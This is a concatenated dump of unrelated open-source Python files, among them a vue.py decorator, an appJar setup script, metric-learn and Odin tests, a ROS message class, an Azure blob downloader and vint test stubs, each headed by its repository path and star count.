"make ip channel client is not supported on platform {}".format(os.name)
)
|
vue/decorators/base.py | adamlwgriffiths/vue.py | 274 | 17351 | from vue.bridge import Object
import javascript
class VueDecorator:
__key__ = None
__parents__ = ()
__id__ = None
__value__ = None
def update(self, vue_dict):
base = vue_dict
for parent in self.__parents__:
base = vue_dict.setdefault(parent, {})
if self.__id__ is None:
base[self.__key__] = self.__value__
else:
base = base.setdefault(self.__key__, {})
value = self.__value__
if isinstance(base.get(self.__id__), dict):
base[self.__id__].update(value)
else:
base[self.__id__] = value
def pyjs_bridge(fn, inject_vue_instance=False):
def wrapper(*args, **kwargs):
args = (javascript.this(), *args) if inject_vue_instance else args
args = tuple(Object.from_js(arg) for arg in args)
kwargs = {k: Object.from_js(v) for k, v in kwargs.items()}
return Object.to_js(fn(*args, **kwargs))
wrapper.__name__ = fn.__name__
return wrapper
|
setup.py | tgolsson/appJar | 666 | 17355 | from setuptools import setup, find_packages
__name__ = "appJar"
__version__ = "0.94.0"
__author__ = "<NAME>"
__desc__ = "An easy-to-use, feature-rich GUI wrapper for tKinter. Designed specifically for use in the classroom, but powerful enough to be used anywhere."
__author_email__ = "<EMAIL>"
__license__ = "Apache 2.0"
__url__ = "http://appJar.info"
__keywords__ = ["python", "gui", "tkinter", "appJar", "interface"]
__packages__= ["appJar"]
__classifiers__ = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Education',
'Topic :: Software Development',
'Topic :: Software Development :: User Interfaces',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: Apache Software License',
]
__long_description__ = """# appJar
Simple tKinter GUIs in Python.
"""
setup(
name=__name__,
packages=__packages__,
version=__version__,
description=__desc__,
long_description=__long_description__,
long_description_content_type="text/markdown",
author=__author__,
author_email=__author_email__,
url=__url__,
keywords=__keywords__,
license=__license__,
classifiers=__classifiers__,
package_data = {
"appJar": ["lib/*.py", "lib/*.txt", "lib/tkdnd2.8/*.tcl", "lib/tkdnd2.8/tcl_files/*.tcl", "lib/tkdnd2.8/tcl_libs/*", "resources/icons/*", "examples/showcase.py", "PYPI.md"]
}
)
|
office-plugin/windows-office/program/wizards/ui/event/RadioDataAware.py | jerrykcode/kkFileView | 6,660 | 17382 | #
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# This file incorporates work covered by the following license notice:
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed
# with this work for additional information regarding copyright
# ownership. The ASF licenses this file to you under the Apache
# License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0 .
#
from .CommonListener import ItemListenerProcAdapter
from .DataAware import DataAware
class RadioDataAware(DataAware):
def __init__(self, data, value, radioButtons):
super(RadioDataAware,self).__init__(data, value)
self.radioButtons = radioButtons
def setToUI(self, value):
selected = int(value)
if selected == -1:
for i in self.radioButtons:
i.State = False
else:
self.radioButtons[selected].State = True
def getFromUI(self):
for index, workwith in enumerate(self.radioButtons):
if workwith.State:
return index
return -1
@classmethod
def attachRadioButtons(self, data, prop, buttons, field):
da = RadioDataAware(data, prop, buttons)
method = getattr(da,"updateData")
for i in da.radioButtons:
i.addItemListener(ItemListenerProcAdapter(method))
return da
|
odin-libraries/python/odin_test.py | gspu/odin | 447 | 17394 | """ Runs tests for Ptyhon Odin SDK """
import unittest
from os import environ
import random
from pymongo import MongoClient
import pyodin as odin
class OdinSdkTest(unittest.TestCase):
""" Establish OdinSdkTest object """
def setUp(self):
client = MongoClient(environ.get('ODIN_MONGODB'))
mongodb = client['odin']
self.collection = mongodb['observability']
def tearDown(self):
self.collection.delete_many({"id" : "test_id"})
def test_condition_not_odin_env(self):
""" Run condition operation outside of Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
odin_test = odin.Odin(config="job.yml", path_type="relative")
cond = odin_test.condition(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(cond, True)
self.assertEqual(None, result)
def test_watch_not_odin_env(self):
""" Run watch operation outside of Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
odin_test = odin.Odin(config="job.yml", path_type="relative")
odin_test.watch(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(None, result)
def test_condition(self):
""" Run condition operation inside Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
# test True sets odin exc env to true and in turn enables logging everything to the DB
odin_test = odin.Odin(test=True, config="job.yml", path_type="relative")
cond = odin_test.condition(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(cond, True)
self.assertEqual(test_desc, result['description'])
def test_watch(self):
""" Run watch operation inside Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
# test True sets odin exc env to true and in turn enables logging everything to the DB
odin_test = odin.Odin(test=True, config="job.yml", path_type="relative")
odin_test.watch(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(test_desc, result['description'])
if __name__ == "__main__":
unittest.main() # run all tests
|
artemis/general/test_dict_ops.py | peteroconnor-bc/artemis | 235 | 17395 | from artemis.general.dict_ops import cross_dict_dicts, merge_dicts
__author__ = 'peter'
def test_cross_dict_dicts():
assert cross_dict_dicts({'a':{'aa': 1}, 'b':{'bb': 2}}, {'c': {'cc': 3}, 'd': {'dd': 4}}) == {
('a','c'):{'aa':1, 'cc':3},
('a','d'):{'aa':1, 'dd':4},
('b','c'):{'bb':2, 'cc':3},
('b','d'):{'bb':2, 'dd':4}
}
def test_dict_merge():
assert merge_dicts({'a': 1, 'b': 2, 'c': 3}, {'c': 4, 'd': 5}, {'d': 6, 'e': 7}) == {
'a': 1,
'b': 2,
'c': 4,
'd': 6,
'e': 7,
}
if __name__ == "__main__":
test_dict_merge()
test_cross_dict_dicts()
|
scripts/redact_cli_py/redact/io/blob_reader.py | jhapran/OCR-Form-Tools | 412 | 17426 | <filename>scripts/redact_cli_py/redact/io/blob_reader.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project
# root for license information.
from typing import List
from pathlib import Path
from azure.storage.blob import ContainerClient
from redact.types.file_bundle import FileBundle
class BlobReader():
def __init__(self, container_url: str, prefix: str):
self.container_client = ContainerClient.from_container_url(
container_url)
self.prefix = prefix
def download_bundles(self, to: str) -> List[FileBundle]:
blobs = self.container_client.list_blobs(name_starts_with=self.prefix)
all_file_name_list = [Path(blob.name).name for blob in blobs]
file_bundles = FileBundle.from_names(all_file_name_list)
for bundle in file_bundles:
image_blob_path = self.prefix + bundle.image_file_name
fott_blob_path = self.prefix + bundle.fott_file_name
ocr_blob_path = self.prefix + bundle.ocr_file_name
image_path = Path(to, bundle.image_file_name)
fott_path = Path(to, bundle.fott_file_name)
ocr_path = Path(to, bundle.ocr_file_name)
with open(image_path, 'wb') as image_file, \
open(fott_path, 'wb') as fott_file, \
open(ocr_path, 'wb') as ocr_file:
image_file.write(
self.container_client.
download_blob(image_blob_path).readall())
fott_file.write(
self.container_client.
download_blob(fott_blob_path).readall())
ocr_file.write(
self.container_client.
download_blob(ocr_blob_path).readall())
return file_bundles
|
Modules/ego_planner/ego-planner-swarm/src/uav_simulator/Utils/multi_map_server/src/multi_map_server/msg/_VerticalOccupancyGridList.py | 473867143/Prometheus | 1,217 | 17429 | """autogenerated by genpy from multi_map_server/VerticalOccupancyGridList.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class VerticalOccupancyGridList(genpy.Message):
_md5sum = "7ef85cc95b82747f51eb01a16bd7c795"
_type = "multi_map_server/VerticalOccupancyGridList"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float32 x
float32 y
int32[] upper
int32[] lower
int32[] mass
"""
__slots__ = ['x','y','upper','lower','mass']
_slot_types = ['float32','float32','int32[]','int32[]','int32[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
x,y,upper,lower,mass
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(VerticalOccupancyGridList, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.x is None:
self.x = 0.
if self.y is None:
self.y = 0.
if self.upper is None:
self.upper = []
if self.lower is None:
self.lower = []
if self.mass is None:
self.mass = []
else:
self.x = 0.
self.y = 0.
self.upper = []
self.lower = []
self.mass = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_2f.pack(_x.x, _x.y))
length = len(self.upper)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.upper))
length = len(self.lower)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.lower))
length = len(self.mass)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.mass))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 8
(_x.x, _x.y,) = _struct_2f.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.upper = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.lower = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.mass = struct.unpack(pattern, str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_2f.pack(_x.x, _x.y))
length = len(self.upper)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.upper.tostring())
length = len(self.lower)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.lower.tostring())
length = len(self.mass)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.mass.tostring())
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 8
(_x.x, _x.y,) = _struct_2f.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.upper = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.lower = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.mass = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_2f = struct.Struct("<2f")
|
docs/examples/timer.py | vlcinsky/nameko | 3,425 | 17441 | <gh_stars>1000+
from nameko.timer import timer
class Service:
name ="service"
@timer(interval=1)
def ping(self):
# method executed every second
print("pong")
|
app/controllers/config/system/slack.py | grepleria/SnitchDNS | 152 | 17442 | <reponame>grepleria/SnitchDNS
from .. import bp
from flask import request, render_template, flash, redirect, url_for
from flask_login import current_user, login_required
from app.lib.base.provider import Provider
from app.lib.base.decorators import admin_required
@bp.route('/slack', methods=['GET'])
@login_required
@admin_required
def slack():
return render_template('config/system/slack.html')
@bp.route('/slack/save', methods=['POST'])
@login_required
@admin_required
def slack_save():
provider = Provider()
settings = provider.settings()
slack_enabled = True if int(request.form.get('slack_enabled', 0)) == 1 else False
settings.save('slack_enabled', slack_enabled)
flash('Settings saved', 'success')
return redirect(url_for('config.slack'))
|
test/test_base_metric.py | Spraitazz/metric-learn | 547 | 17460 | import pytest
import re
import unittest
import metric_learn
import numpy as np
from sklearn import clone
from test.test_utils import ids_metric_learners, metric_learners, remove_y
from metric_learn.sklearn_shims import set_random_state, SKLEARN_AT_LEAST_0_22
def remove_spaces(s):
return re.sub(r'\s+', '', s)
def sk_repr_kwargs(def_kwargs, nndef_kwargs):
"""Given the non-default arguments, and the default
keywords arguments, build the string that will appear
in the __repr__ of the estimator, depending on the
version of scikit-learn.
"""
if SKLEARN_AT_LEAST_0_22:
def_kwargs = {}
def_kwargs.update(nndef_kwargs)
args_str = ",".join(f"{key}={repr(value)}"
for key, value in def_kwargs.items())
return args_str
class TestStringRepr(unittest.TestCase):
def test_covariance(self):
def_kwargs = {'preprocessor': None}
nndef_kwargs = {}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.Covariance())),
remove_spaces(f"Covariance({merged_kwargs})"))
def test_lmnn(self):
def_kwargs = {'convergence_tol': 0.001, 'init': 'auto', 'k': 3,
'learn_rate': 1e-07, 'max_iter': 1000, 'min_iter': 50,
'n_components': None, 'preprocessor': None,
'random_state': None, 'regularization': 0.5,
'verbose': False}
nndef_kwargs = {'convergence_tol': 0.01, 'k': 6}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.LMNN(convergence_tol=0.01, k=6))),
remove_spaces(f"LMNN({merged_kwargs})"))
def test_nca(self):
def_kwargs = {'init': 'auto', 'max_iter': 100, 'n_components': None,
'preprocessor': None, 'random_state': None, 'tol': None,
'verbose': False}
nndef_kwargs = {'max_iter': 42}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.NCA(max_iter=42))),
remove_spaces(f"NCA({merged_kwargs})"))
def test_lfda(self):
def_kwargs = {'embedding_type': 'weighted', 'k': None,
'n_components': None, 'preprocessor': None}
nndef_kwargs = {'k': 2}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.LFDA(k=2))),
remove_spaces(f"LFDA({merged_kwargs})"))
def test_itml(self):
def_kwargs = {'convergence_threshold': 0.001, 'gamma': 1.0,
'max_iter': 1000, 'preprocessor': None,
'prior': 'identity', 'random_state': None, 'verbose': False}
nndef_kwargs = {'gamma': 0.5}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.ITML(gamma=0.5))),
remove_spaces(f"ITML({merged_kwargs})"))
def_kwargs = {'convergence_threshold': 0.001, 'gamma': 1.0,
'max_iter': 1000, 'num_constraints': None,
'preprocessor': None, 'prior': 'identity',
'random_state': None, 'verbose': False}
nndef_kwargs = {'num_constraints': 7}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.ITML_Supervised(num_constraints=7))),
remove_spaces(f"ITML_Supervised({merged_kwargs})"))
def test_lsml(self):
def_kwargs = {'max_iter': 1000, 'preprocessor': None, 'prior': 'identity',
'random_state': None, 'tol': 0.001, 'verbose': False}
nndef_kwargs = {'tol': 0.1}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.LSML(tol=0.1))),
remove_spaces(f"LSML({merged_kwargs})"))
def_kwargs = {'max_iter': 1000, 'num_constraints': None,
'preprocessor': None, 'prior': 'identity',
'random_state': None, 'tol': 0.001, 'verbose': False,
'weights': None}
nndef_kwargs = {'verbose': True}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.LSML_Supervised(verbose=True))),
remove_spaces(f"LSML_Supervised({merged_kwargs})"))
def test_sdml(self):
def_kwargs = {'balance_param': 0.5, 'preprocessor': None,
'prior': 'identity', 'random_state': None,
'sparsity_param': 0.01, 'verbose': False}
nndef_kwargs = {'verbose': True}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.SDML(verbose=True))),
remove_spaces(f"SDML({merged_kwargs})"))
def_kwargs = {'balance_param': 0.5, 'num_constraints': None,
'preprocessor': None, 'prior': 'identity',
'random_state': None, 'sparsity_param': 0.01,
'verbose': False}
nndef_kwargs = {'sparsity_param': 0.5}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.SDML_Supervised(sparsity_param=0.5))),
remove_spaces(f"SDML_Supervised({merged_kwargs})"))
def test_rca(self):
def_kwargs = {'n_components': None, 'preprocessor': None}
nndef_kwargs = {'n_components': 3}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.RCA(n_components=3))),
remove_spaces(f"RCA({merged_kwargs})"))
def_kwargs = {'chunk_size': 2, 'n_components': None, 'num_chunks': 100,
'preprocessor': None, 'random_state': None}
nndef_kwargs = {'num_chunks': 5}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.RCA_Supervised(num_chunks=5))),
remove_spaces(f"RCA_Supervised({merged_kwargs})"))
def test_mlkr(self):
def_kwargs = {'init': 'auto', 'max_iter': 1000,
'n_components': None, 'preprocessor': None,
'random_state': None, 'tol': None, 'verbose': False}
nndef_kwargs = {'max_iter': 777}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.MLKR(max_iter=777))),
remove_spaces(f"MLKR({merged_kwargs})"))
def test_mmc(self):
def_kwargs = {'convergence_threshold': 0.001, 'diagonal': False,
'diagonal_c': 1.0, 'init': 'identity', 'max_iter': 100,
'max_proj': 10000, 'preprocessor': None,
'random_state': None, 'verbose': False}
nndef_kwargs = {'diagonal': True}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.MMC(diagonal=True))),
remove_spaces(f"MMC({merged_kwargs})"))
def_kwargs = {'convergence_threshold': 1e-06, 'diagonal': False,
'diagonal_c': 1.0, 'init': 'identity', 'max_iter': 100,
'max_proj': 10000, 'num_constraints': None,
'preprocessor': None, 'random_state': None,
'verbose': False}
nndef_kwargs = {'max_iter': 1}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.MMC_Supervised(max_iter=1))),
remove_spaces(f"MMC_Supervised({merged_kwargs})"))
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_get_metric_is_independent_from_metric_learner(estimator,
build_dataset):
"""Tests that the get_metric method returns a function that is independent
from the original metric learner"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
# we fit the metric learner on it and then we compute the metric on some
# points
model.fit(*remove_y(model, input_data, labels))
metric = model.get_metric()
score = metric(X[0], X[1])
# then we refit the estimator on another dataset
model.fit(*remove_y(model, np.sin(input_data), labels))
# we recompute the distance between the two points: it should be the same
score_bis = metric(X[0], X[1])
assert score_bis == score
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_get_metric_raises_error(estimator, build_dataset):
"""Tests that the metric returned by get_metric raises errors similar to
the distance functions in scipy.spatial.distance"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(*remove_y(model, input_data, labels))
metric = model.get_metric()
list_test_get_metric_raises = [(X[0].tolist() + [5.2], X[1]), # vectors with
# different dimensions
(X[0:4], X[1:5]), # 2D vectors
(X[0].tolist() + [5.2], X[1] + [7.2])]
# vectors of same dimension but incompatible with what the metric learner
# was trained on
for u, v in list_test_get_metric_raises:
with pytest.raises(ValueError):
metric(u, v)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_get_metric_works_does_not_raise(estimator, build_dataset):
"""Tests that the metric returned by get_metric does not raise errors (or
warnings) similarly to the distance functions in scipy.spatial.distance"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(*remove_y(model, input_data, labels))
metric = model.get_metric()
list_test_get_metric_doesnt_raise = [(X[0], X[1]),
(X[0].tolist(), X[1].tolist()),
(X[0][None], X[1][None])]
for u, v in list_test_get_metric_doesnt_raise:
with pytest.warns(None) as record:
metric(u, v)
assert len(record) == 0
# Test that the scalar case works
model.components_ = np.array([3.1])
metric = model.get_metric()
for u, v in [(5, 6.7), ([5], [6.7]), ([[5]], [[6.7]])]:
with pytest.warns(None) as record:
metric(u, v)
assert len(record) == 0
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_n_components(estimator, build_dataset):
"""Check that estimators that have a n_components parameters can use it
and that it actually works as expected"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
if hasattr(model, 'n_components'):
set_random_state(model)
model.set_params(n_components=None)
model.fit(*remove_y(model, input_data, labels))
assert model.components_.shape == (X.shape[1], X.shape[1])
model = clone(estimator)
set_random_state(model)
model.set_params(n_components=X.shape[1] - 1)
model.fit(*remove_y(model, input_data, labels))
assert model.components_.shape == (X.shape[1] - 1, X.shape[1])
model = clone(estimator)
set_random_state(model)
model.set_params(n_components=X.shape[1] + 1)
with pytest.raises(ValueError) as expected_err:
model.fit(*remove_y(model, input_data, labels))
assert (str(expected_err.value) ==
'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))
model = clone(estimator)
set_random_state(model)
model.set_params(n_components=0)
with pytest.raises(ValueError) as expected_err:
model.fit(*remove_y(model, input_data, labels))
assert (str(expected_err.value) ==
'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))
if __name__ == '__main__':
unittest.main()
|
examples/geomopt/20-callback.py | QuESt-Calculator/pyscf | 501 | 17461 | <reponame>QuESt-Calculator/pyscf
#!/usr/bin/env python
'''
Optimize molecular geometry within the environment of QM/MM charges.
'''
from pyscf import gto, scf
from pyscf.geomopt import berny_solver
from pyscf.geomopt import geometric_solver
mol = gto.M(atom='''
C 0.000000 0.000000 -0.542500
O 0.000000 0.000000 0.677500
H 0.000000 0.9353074360871938 -1.082500
H 0.000000 -0.9353074360871938 -1.082500
''',
basis='3-21g')
mf = scf.RHF(mol)
# Run analyze function in callback
def cb(envs):
mf = envs['g_scanner'].base
mf.analyze(verbose=4)
#
# Method 1: Pass callback to optimize function
#
geometric_solver.optimize(mf, callback=cb)
berny_solver.optimize(mf, callback=cb)
#
# Method 2: Add callback to geometry optimizer
#
opt = mf.nuc_grad_method().as_scanner().optimizer()
opt.callback = cb
opt.kernel()
|
atlas/foundations_contrib/src/foundations_contrib/helpers/shell.py | DeepLearnI/atlas | 296 | 17485 | <gh_stars>100-1000
def find_bash():
import os
if os.name == 'nt':
return _find_windows_bash()
return '/bin/bash'
def _find_windows_bash():
winreg = _winreg_module()
import csv
StringIO = _get_string_io()
from os.path import dirname
sub_key = 'Directory\\shell\\git_shell\\command'
value = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, sub_key)
with StringIO(value) as file:
reader = csv.reader(file, delimiter=' ', quotechar='"')
git_bash_location = list(reader)[0][0]
git_bash_directory = git_bash_location.split('\\git-bash.exe')[0]
bash_location = git_bash_directory + '\\bin\\bash.exe'
return bash_location
def _get_string_io():
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
return StringIO
def _winreg_module():
import winreg
return winreg
|
test/unit/vint/ast/plugin/scope_plugin/stub_node.py | mosheavni/vint | 538 | 17511 | <reponame>mosheavni/vint
from vint.ast.node_type import NodeType
from vint.ast.plugin.scope_plugin.identifier_attribute import (
IDENTIFIER_ATTRIBUTE,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG,
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT,
)
def create_id(id_value, is_declarative=True, is_function=False, is_autoload=False,
is_declarative_parameter=False, is_on_str_expr_context=False):
return {
'type': NodeType.IDENTIFIER.value,
'value': id_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: is_declarative,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: is_function,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: is_autoload,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: is_declarative_parameter,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: is_on_str_expr_context,
},
}
def create_env(env_value):
return {
'type': NodeType.ENV.value,
'value': env_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: True,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_option(opt_value):
return {
'type': NodeType.OPTION.value,
'value': opt_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: True,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_reg(reg_value):
return {
'type': NodeType.REG.value,
'value': reg_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: True,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_curlyname(is_declarative=True):
""" Create a node as a `my_{'var'}`
"""
return {
'type': NodeType.CURLYNAME.value,
'value': [
{
'type': NodeType.CURLYNAMEPART.value,
'value': 'my_',
},
{
'type': NodeType.CURLYNAMEEXPR.value,
'value': {
'type': NodeType.CURLYNAMEEXPR.value,
'value': 'var',
},
}
],
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: is_declarative,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: True,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_subscript_member(is_declarative=True):
return {
'type': NodeType.IDENTIFIER.value,
'value': 'member',
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: is_declarative,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: True,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
|
